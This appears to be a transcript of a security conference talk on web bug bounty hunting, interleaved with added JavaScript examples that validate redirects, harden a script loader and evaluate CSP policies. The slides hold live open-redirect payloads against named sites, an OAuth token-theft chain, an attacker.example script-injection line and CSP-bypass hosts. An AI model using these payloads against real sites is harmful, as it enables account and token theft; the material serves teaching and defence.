Go hack yourself … or someone else will - Frans Rosén - PowerPoint PPT Presentation



  1. detectify  Go hack yourself … or someone else will  Frans Rosén @fransrosen

  2. Frans Rosén, Security Advisor @detectify (twitter: @fransrosen). Blog at labs.detectify.com. HackerOne #5 @ hackerone.com/thanks. "The Swedish Ninja"

  3. Rundown
   1. Background
   2. Approaching a target
   3. Domain/URL validation
   4. Free money + Automation
   5. End

  4. How it started

  5. THEN I FREAKED OUT, and so on…

  6-7. Thailand

  8. Approaching a target

  9-10. SWFs
   ZeroClipboard.swf column3d.swf flowplayer.swf video.swf swfupload.swf OneClipboard.swf clippy.swf flashmediaelement.swf Jplayer.swf plupload.swf amline.swf video-js.swf Line.swf …

  11. Facebook Connect
   By @nirgoldschlager and @homakov
   http://homakov.blogspot.se/2013/02/hacking-facebook-with-oauth2-and-chrome.html
   http://www.breaksec.com/?p=6039

  12. Facebook Connect
   https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email&client_id=298315034451&response_type=token&redirect_uri=https://www.example.com/login

  13. Facebook Connect
   https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email&client_id=298315034451&response_type=token&redirect_uri=https://xxx.example.com/yyy
   No restrictions! Any subdomain and any path under the app's domain is accepted as redirect_uri, so with response_type=token an open redirect anywhere on that domain can be pointed at to receive the access token.

  14-15. URL-validation is hard #1
   http://y.com\@x.com
   java:   new URL(d);                         = x.com
   php:    parse_url(d);                       = x.com
   chrome: document.createElement('a').href=d; = y.com

  16. RFC 3986 ABNF #RTFM https://tools.ietf.org/html/rfc3986#page-49

  17. PHP FIXED! https://github.com/php/php-src/commit/f705063e23183c073837bb76eea6a49d721b37f2#diff-8c81b7e6f1bafce737814315214a5f23R245

  18. Open Redirects in real life
   https://www.victim.com/logout?redirect_url=https://example.com\@www.victim.com
   https://www.linkedin.com/uas/login?session_redirect=https://example.com%252f@www.linkedin.com%2Fsettings
   https://vimeo.com/log_in?redirect=/%09/example.com
   https://test6473.zendesk.com/access/login?return_to=//example.com:%252525252f@test6473.zendesk.com/x
   https://trello.com/login?returnUrl=/\example.com
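The parser disagreement on slides 14-15 and the payloads on slide 18, as an added example that is not part of the talk: the same string run through a naive host extraction modelled on what slide 15 reports for parse_url()/java.net.URL (an assumption about their behaviour, not their code) and through the WHATWG parser that Chrome and Node use; a decode-until-stable step that mimics the repeated server-side decoding the linkedin and zendesk payloads rely on; an exact-match rule for the OAuth redirect_uri that slide 13 shows Facebook lacked; and a redirect check that rejects every slide-18 payload. Origins and paths come from the slides, everything else is constructed. Needs Node 18 or later.

```javascript
// Added example, not from the talk. Node >= 18 (global URL).

// Naive host extraction, modelled on what slide 15 reports for parse_url()/java.net.URL
// (an assumption about their behaviour, not their source): the authority runs to the
// first '/', '?' or '#', and the host is whatever follows the last '@'. '\' is not a
// delimiter here, so "y.com\@x.com" is read as userinfo "y.com\" and host "x.com".
function naiveHost(url) {
  const m = url.match(/^[a-z][a-z0-9+.-]*:\/\/([^/?#]*)/i);
  if (!m) return null;
  const at = m[1].lastIndexOf('@');
  const hostport = at === -1 ? m[1] : m[1].slice(at + 1);
  return hostport.split(':')[0].toLowerCase();
}

// Browser-accurate host: the WHATWG URL parser (Chrome, Firefox, Safari and Node today).
// For http(s) a '\' ends the authority just like '/', and ASCII tab/newline are removed
// from the input before parsing, which is what the '\' and %09 payloads exploit.
function browserHost(url, base) {
  try {
    return new URL(url, base).hostname;
  } catch {
    return null;
  }
}

// Many back ends percent-decode more than once (framework, then application code).
// Decoding until the string stops changing shows what %252f and %252525252f become.
function serverDecode(value, maxRounds = 8) {
  let cur = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(cur);
    } catch {
      break; // malformed escape: keep what we have
    }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Redirect check. `location` must be the exact string that will be written into the
// Location header. Resolve it against our own origin with the browser's parser and
// require the same scheme and host; no prefix or suffix matching on the raw string.
function isSafeRedirect(location, ownOrigin) {
  const own = new URL(ownOrigin);
  let target;
  try {
    target = new URL(location, own);
  } catch {
    return false;
  }
  return target.protocol === own.protocol && target.host === own.host;
}

// OAuth redirect_uri: compare the requested value with the registered one as whole
// URLs parsed by the same parser. Slide 13's https://xxx.example.com/yyy must not
// pass against a registered https://www.example.com/login.
function redirectUriAllowed(registeredUris, requested) {
  let req;
  try {
    req = new URL(requested);
  } catch {
    return false;
  }
  if (req.hash) return false; // a fragment is never part of a registered URI
  return registeredUris.some((r) => new URL(r).href === req.href);
}

// The slide-18 payloads as a constructed table: [site origin, raw parameter value].
const SLIDE_PAYLOADS = [
  ['https://www.victim.com', 'https://example.com\\@www.victim.com'],
  ['https://www.linkedin.com', 'https://example.com%252f@www.linkedin.com%2Fsettings'],
  ['https://vimeo.com', '/%09/example.com'],
  ['https://test6473.zendesk.com', '//example.com:%252525252f@test6473.zendesk.com/x'],
  ['https://trello.com', '/\\example.com'],
];

// Decode each payload the way a server would, then ask where a browser lands and
// whether the hardened check lets it through. Every row ends on example.com, unsafe.
function checkSlidePayloads() {
  return SLIDE_PAYLOADS.map(([origin, raw]) => {
    const decoded = serverDecode(raw);
    return { raw, decoded, browserHost: browserHost(decoded, origin), safe: isSafeRedirect(decoded, origin) };
  });
}

console.log(naiveHost('http://y.com\\@x.com'), browserHost('http://y.com\\@x.com')); // x.com y.com
console.log(checkSlidePayloads());
```

The practical rule the block encodes: validate the string you are about to emit, after every decoding step your stack performs, with the parser the browser will use, and compare scheme and host for equality. The vimeo payload is harmless while the tab is still `%09`; it becomes `//example.com` the moment something decodes it and a browser strips the tab.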

  19-22. Firefox…
   Chrome: Invalid
   Safari: Domain not found
   Firefox: example.com !  (CVE-2015-7195, https://www.mozilla.org/en-US/security/advisories/mfsa2015-129/)

  23-27. Firefox + Prezi…
   https://prezi.com/redirect/?url=//example.com%0a%2523.prezi.com
   HTTP/1.1 301
   Location: //example.com%0a%23.prezi.com
   (%0a is a newline and %2523 a double-encoded '#': the redirect's host check sees a value ending in .prezi.com, while Firefox at the time, per slide 22, resolved it to example.com.)
   Chained into Facebook Connect with the open redirect as redirect_uri:
   https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email&response_type=token&redirect_uri=https://prezi.com/redirect/%3furl=https://example.com%25250a%252523.prezi.com&client_id=298315034451
   NOO! :(

  28-30. 3rd-party scripts
   Grep patterns for third-party scripts that read URL parameters:
   (get)?(query|url|qs|hash)param
   location\.(hash|href|search)\.match

   A tag loader that takes its script URL from the kxsrc query parameter:
   k.type='text/javascript';
   var m,src=(m=location.href.match(/\bkxsrc=([^&]+)\b/)) && decodeURIComponent(m[1]);
   k.src=src||'https://cdn.krxd.net/controltag?confid=HrUwtkcl';

  31-32. Uber XSS
   k.src=src||'https://cdn.krxd.net/controltag?confid=HrUwtkcl';
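The sink on slides 28-32, as an added example that is neither the talk's code nor the vendor's tag: the slide-29 loader logic reproduced as a function that takes the page URL as a parameter (so it runs outside a browser), a hardened replacement that pins the override to the tag's own origin and path, and a line-by-line grep using the slide-28 patterns over a constructed script sample. The attacker host and the `getQueryParam` helper in the sample are invented for the demo. Needs Node 18 or later.

```javascript
// Added example, not from the talk. Node >= 18 (global URL).

// Default the tag loads when no override is present (the URL on slide 29).
const DEFAULT_TAG = 'https://cdn.krxd.net/controltag?confid=HrUwtkcl';

// Vulnerable: the slide-29 logic. Everything after "kxsrc=" up to the next '&'
// becomes a script src, so ?kxsrc=//attacker.example/x.js loads attacker-controlled
// JavaScript in the embedding page (the Uber XSS on slides 31-32).
function pickTagSrcVulnerable(href) {
  var m, src = (m = href.match(/\bkxsrc=([^&]+)\b/)) && decodeURIComponent(m[1]);
  return src || DEFAULT_TAG;
}

// Hardened: read the parameter with a real URL parser, resolve it against the tag's
// origin with the browser's parser, and accept only that origin and a known path.
// Absolute, protocol-relative, userinfo-tricked or javascript: overrides all resolve
// to a different origin and fall back to the default.
const TAG_ORIGIN = 'https://cdn.krxd.net';
function pickTagSrcHardened(href) {
  let override;
  try {
    override = new URL(href).searchParams.get('kxsrc');
  } catch {
    return DEFAULT_TAG;
  }
  if (!override) return DEFAULT_TAG;
  let u;
  try {
    u = new URL(override, TAG_ORIGIN);
  } catch {
    return DEFAULT_TAG;
  }
  if (u.origin !== TAG_ORIGIN || !u.pathname.startsWith('/controltag')) return DEFAULT_TAG;
  return u.href;
}

// Hunting: the slide-28 patterns, applied to third-party script text one line at a time.
const SINK_PATTERNS = [
  /(get)?(query|url|qs|hash)param/i,
  /location\.(hash|href|search)\.match/,
];
function findParamSinks(scriptText) {
  const findings = [];
  scriptText.split('\n').forEach((line, i) => {
    for (const re of SINK_PATTERNS) {
      if (re.test(line)) findings.push({ line: i + 1, pattern: re.source, text: line.trim() });
    }
  });
  return findings;
}

// Constructed sample: the slide-29 snippet plus an invented helper call on the last line.
const SAMPLE_SCRIPT = [
  "var k = document.createElement('script');",
  "k.type='text/javascript';",
  "var m,src=(m=location.href.match(/\\bkxsrc=([^&]+)\\b/)) && decodeURIComponent(m[1]);",
  "k.src=src||'https://cdn.krxd.net/controltag?confid=HrUwtkcl';",
  "var campaign = getQueryParam('utm_campaign'); // hypothetical helper",
].join('\n');

console.log(pickTagSrcVulnerable('https://www.uber.com/?kxsrc=//attacker.example/x.js')); // //attacker.example/x.js
console.log(pickTagSrcHardened('https://www.uber.com/?kxsrc=//attacker.example/x.js'));   // the default tag
console.log(findParamSinks(SAMPLE_SCRIPT).map((f) => f.line)); // [ 3, 5 ]
```

The grep is only a triage tool: every hit still has to be traced to a sink (`script.src`, `innerHTML`, `eval`, `location`), but on a large third-party bundle it gets you to the few lines worth reading.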

  33-34. CSP bypass
   script-src 'self' https://ajax.googleapis.com
   <script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
   https://html5sec.org/minichallenges/3

  35-36. CSP bypass
   script-src 'self' https://cdn.mxpnl.com

  37-38. CSP bypass
   script-src 'self' https://www.googleadservices.com

  39. CSP bypass

  40. Google’s CSP evaluator https://csp-evaluator.withgoogle.com
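The whitelisting mistake on slides 33-40, as an added example that is not part of the talk: a minimal CSP header parser and a `script-src` check that flags the three hosts the slides show being used to bypass the policy (ajax.googleapis.com serving AngularJS on slide 34, cdn.mxpnl.com and www.googleadservices.com on slides 35-38), plus wildcard hosts and `'unsafe-inline'` without a nonce or hash. Next to the slide-34 policy is a nonce-based one of the kind the CSP evaluator on slide 40 accepts; the nonce value is a placeholder and the bypass-host list is limited to what the slides show. Needs Node 14 or later.

```javascript
// Added example, not from the talk. Node >= 14.

// Parse "directive value value; directive value" into a Map. The first occurrence
// of a directive wins, as the CSP spec requires; later duplicates are ignored.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Host part of a host-source such as https://cdn.mxpnl.com:443/lib.js or *.example.com.
// Returns null for keywords ('self', 'nonce-…', 'sha256-…') and scheme-only sources ("https:").
function hostOf(source) {
  if (source.startsWith("'")) return null;
  const m = source.match(/^(?:[a-z][a-z0-9+.-]*:\/\/)?([^/:]+)(?::(?:\d+|\*))?(?:\/.*)?$/i);
  return m ? m[1].toLowerCase() : null;
}

// Hosts the slides show being used to load attacker-chosen script once they are
// whitelisted whole (slides 34-38). A real evaluator carries a much longer list.
const KNOWN_BYPASS_HOSTS = new Set(['ajax.googleapis.com', 'cdn.mxpnl.com', 'www.googleadservices.com']);

// Findings for the effective script-src of a policy (script-src, else default-src).
function evaluateScriptSrc(header) {
  const csp = parseCsp(header);
  const sources = csp.get('script-src') ?? csp.get('default-src');
  if (!sources) return ['no script-src or default-src: any script is allowed'];
  const findings = [];
  const hasNonceOrHash = sources.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  if (sources.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push("'unsafe-inline': any inline script runs");
  }
  // With 'strict-dynamic' plus a nonce/hash, supporting browsers ignore host sources,
  // so a whitelisted CDN is no longer a way in and is not reported.
  const strictDynamic = sources.includes("'strict-dynamic'") && hasNonceOrHash;
  for (const s of sources) {
    const host = hostOf(s);
    if (host === null || strictDynamic) continue;
    if (host === '*' || host.startsWith('*.')) findings.push(`${s}: wildcard host`);
    if (KNOWN_BYPASS_HOSTS.has(host)) {
      findings.push(`${s}: whole host whitelisted; the talk shows it serving script that bypasses script-src`);
    }
  }
  return findings;
}

// The slide-34 policy and a nonce-based policy for comparison (placeholder nonce).
const WEAK_POLICY = "script-src 'self' https://ajax.googleapis.com";
const STRICT_POLICY = "script-src 'nonce-R4nd0mV4lu3' 'strict-dynamic'; object-src 'none'; base-uri 'none'";

console.log(evaluateScriptSrc(WEAK_POLICY));   // one finding, for ajax.googleapis.com
console.log(evaluateScriptSrc(STRICT_POLICY)); // []
```

The nonce in the strict policy must be generated fresh per response and attached to every legitimate `<script>`; `'strict-dynamic'` then lets those scripts load their own dependencies without any host whitelist, which is exactly what removes the CDN bypass.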

  41. Gotta catch’em all!

  42. October 2014 https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/

  43-44. Subdomain Takeover
   campaign.site.com  Campaign!  Fake site!

  45. Customer Responses

  46-47. Subdomains

  48-50. Facebook

  51. Facebook
   POST /rest/v1.1/me/transactions?http_envelope=1 HTTP/1.1
   Host: public-api.wordpress.com

   cart[blog_id]=44444444

  52-53. Facebook

  54-57. Uber

  58-59. September 2016 http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty

  60. MX-records

  61. Conflict check + Validation

  62. Oh, add this!

  63. post-host-master-admin

  64. Tadaa!

  65. We now get postmaster!

  66. (image only)

  67-72. Google XXE https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/

  73. Chrome View Source

  74-82. Chrome… (slide 81: *click something*)

  83-87. GitHub’s search OMG! http://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/

  88-89. The email, 02:35

  90. The response

  91. Go hack yourself … or someone else will  Frans Rosén (@fransrosen) – www.detectify.com
